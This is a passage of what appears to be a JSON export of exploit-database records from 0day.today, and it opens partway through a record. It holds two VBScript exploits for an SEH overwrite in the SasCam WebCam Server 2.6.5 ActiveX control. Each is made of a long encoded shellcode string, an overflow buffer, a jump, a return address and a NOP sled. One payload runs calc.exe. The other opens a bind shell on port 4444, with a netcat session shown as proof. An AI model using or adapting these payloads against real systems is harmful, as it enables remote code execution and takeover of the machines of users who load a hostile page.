classid='clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3'\r\nid='target'></object>\r\n<script language='vbscript'>\r\n \r\n'for debugging/custom prolog\r\n'targetFile = \"C:\\Program Files\\SasCam_free\\XHTTP.dll\"\r\n'prototype = \"Sub Head ( ByVal sURL As String )\"\r\n'memberName = \"Head\"\r\n'progid = \"XHTTP.HTTP\"\r\n'argCount = 1\r\n \r\n'EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2\r\nsc = unescape(\"%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49\") & _\r\n \r\nunescape(\"%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68\") & _\r\n \r\nunescape(\"%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42\") & _\r\n \r\nunescape(\"%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a\") & _\r\n \r\nunescape(\"%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c\") & _\r\n \r\nunescape(\"%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45\") & _\r\n \r\nunescape(\"%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70\") & _\r\n \r\nunescape(\"%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c\") & _\r\n \r\nunescape(\"%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f\") & _\r\n \r\nunescape(\"%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d\") & _\r\n \r\nunescape(\"%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46\") & _\r\n \r\nunescape(\"%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77\") & _\r\n \r\nunescape(\"%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a\") & _\r\n \r\nunescape(\"%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f\") & _\r\n \r\nunescape(\"%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35\") & _\r\n \r\nunescape(\"%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d\") & _\r\n \r\nunescape(\"%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71\") & _\r\n \r\nunescape(\"%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f\") & _\r\n \r\nunescape(\"%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52\") & _\r\n \r\nunescape(\"%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61\") & _\r\n \r\nunescape(\"%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35\") & _\r\n unescape(\"%50%68\")\r\n \r\nbuffer = String(8349, \"A\")\r\nnext_seh = unescape(\"%eb%06%90%90\")\r\nseh = unescape(\"%56%29%d1%72\") ' 0x72D12956 [msacm32.drv]\r\nnops = String(20, unescape(\"%90\")) ' nop sled\r\njunk = String(4151, \"B\")\r\n \r\nexploit = buffer + next_seh + seh + nops + sc + junk\r\ntarget.Head exploit\r\n \r\n</script>\r\n\r\n\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/13127"}, {"lastseen": "2016-04-20T01:12:27", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "Blake", "published": "2010-07-03T00:00:00", "type": "zdt", "title": "SasCam WebCam Server v2.6.5 ActiveX SEH Overwrite", "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-07-03T00:00:00", "href": "http://0day.today/exploit/description/13103", "id": "1337DAY-ID-13103", "sourceData": "=================================================\r\nSasCam WebCam Server v2.6.5 ActiveX SEH Overwrite\r\n=================================================\r\n\r\n\r\n<html>\r\n<object classid='clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3'\r\nid='target'></object>\r\n<script language = 'vbscript'>\r\n \r\n'SEH Overwrite exploited by Blake\r\n'Original EIP method by callAX\r\n'Tested on XP SP3/IE7 in virtualbox\r\n'$ nc 192.168.1.155 4444\r\n'Microsoft Windows XP [Version 5.1.2600]\r\n'(C) Copyright 1985-2001 Microsoft Corp.\r\n'\r\n'C:\\Documents and Settings\\blake\\Desktop>\r\n \r\n \r\nbuffer = String(8349, \"A\")\r\nnseh = unescape(\"%eb%06%90%90\") ' short jump\r\nseh = unescape(\"%4E%20%D1%72\") ' 0x72D1204E [msacm32.drv]\r\nnops = String(20, unescape(\"%90\")) ' nop sled\r\njunk = String(2000, \"C\")\r\n \r\n<!-- bind shell port 4444 - around 1980 bytes of space for shellcode -->\r\n \r\nsc = unescape(\"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49\") & _\r\n unescape(\"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36\")\r\n& _\r\n unescape(\"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34\")\r\n& _\r\n unescape(\"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41\")\r\n& _\r\n unescape(\"%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e\")\r\n& _\r\n unescape(\"%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48\")\r\n& _\r\n unescape(\"%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37\")\r\n& _\r\n unescape(\"%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58\")\r\n& _\r\n unescape(\"%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46%53%4b%48\")\r\n& _\r\n unescape(\"%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46%38%42%4c\")\r\n& _\r\n unescape(\"%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44%4c%4b%4e\")\r\n& _\r\n unescape(\"%46%4f%4b%53%46%55%46%42%4a%52%45%57%45%4e%4b%58\")\r\n& _\r\n unescape(\"%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e%30%4b%44\")\r\n& _\r\n unescape(\"%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e%32%4b%48\")\r\n& _\r\n unescape(\"%49%38%4e%56%46%42%4e%31%41%46%43%4c%41%53%4b%4d\")\r\n& _\r\n unescape(\"%46%36%4b%58%43%54%42%43%4b%48%42%44%4e%50%4b%58\")\r\n& _\r\n unescape(\"%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50%35%4a%56\")\r\n& _\r\n unescape(\"%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48%4d%48%46\")\r\n& _\r\n unescape(\"%43%35%48%56%4a%36%43%33%44%53%4a%46%47%47%43%37\")\r\n& _\r\n unescape(\"%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b%4c%4d%4e\")\r\n& _\r\n unescape(\"%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49%48%45%4e\")\r\n& _\r\n unescape(\"%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c%36%44%50\")\r\n& _\r\n unescape(\"%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d%4a%47%55\")\r\n& _\r\n unescape(\"%4f%4f%48%4d%43%55%43%35%43%35%43%55%43%45%43%54\")\r\n& _\r\n unescape(\"%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a%56%41%41\")\r\n& _\r\n unescape(\"%4e%45%48%46%43%55%49%48%41%4e%45%39%4a%36%46%4a\")\r\n& _\r\n unescape(\"%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c%46%42%41\")\r\n& _\r\n unescape(\"%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d%4a%50%32\")\r\n& _\r\n unescape(\"%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f%4f%42%4d\")\r\n& _\r\n unescape(\"%4a%36%45%4e%49%34%48%48%49%54%47%45%4f%4f%48%4d\")\r\n& _\r\n unescape(\"%42%35%46%35%46%55%45%45%4f%4f%42%4d%43%39%4a%46\")\r\n& _\r\n unescape(\"%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48%4d%45%45\")\r\n& _\r\n unescape(\"%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a%46%43%46\")\r\n& _\r\n unescape(\"%4d%56%49%38%45%4e%4c%56%42%45%49%35%49%42%4e%4c\")\r\n& _\r\n unescape(\"%49%38%47%4e%4c%46%46%54%49%38%44%4e%41%33%42%4c\")\r\n& _\r\n unescape(\"%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44%44%4e%32\")\r\n& _\r\n unescape(\"%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b%4a%4a%46\")\r\n& _\r\n unescape(\"%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46%44%4f%4f\")\r\n& _\r\n unescape(\"%48%4d%4b%55%47%55%44%55%41%45%41%45%41%45%4c%56\")\r\n& _\r\n unescape(\"%41%30%41%45%41%35%45%45%41%45%4f%4f%42%4d%4a%46\")\r\n& _\r\n unescape(\"%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48%4d%4c%36\")\r\n& _\r\n unescape(\"%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47%35%4e%4f\")\r\n& _\r\n unescape(\"%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f%4f%42%4d\")\r\n& _\r\n unescape(\"%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f%4f%48%4d\")\r\n& _\r\n unescape(\"%4f%4f%42%4d%5a\")\r\n \r\nexploit = buffer + nseh + seh + nops + sc + junk\r\ntarget.Get exploit\r\n \r\n</script>\r\n<html>\r\n\r\n\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/13103"}]}}